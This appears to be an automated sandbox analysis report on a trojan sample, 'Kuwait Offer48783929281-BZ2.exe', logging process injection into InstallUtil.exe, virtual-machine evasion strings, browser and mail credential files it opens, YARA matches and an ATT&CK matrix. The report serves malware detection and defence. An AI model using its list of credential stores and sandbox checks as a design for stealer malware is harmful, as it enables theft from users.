                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 45A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 44B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F97FB3 sgdt fword ptr [esi]8_2_05F97FB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000002.00000002.1477831718.0000000000974000.00000004.00000020.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1475768189.0000000000692000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1586935967.0000000005D6F000.00000004.00000020.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1560908195.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2587445459.000000000603D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348001830.0000000001413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63C000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63E000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 591008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6C1008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AC8008Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeQueries volume information: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | 1 Credentials in Registry | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 13 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 13 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

[Behavior graph: ID: 1528672; Sample: Kuwait Offer48783929281-BZ2.exe; Start date: 08/10/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label
Kuwait Offer48783929281-BZ2.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
Kuwait Offer48783929281-BZ2.exe | 28% | Virustotal |
Kuwait Offer48783929281-BZ2.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
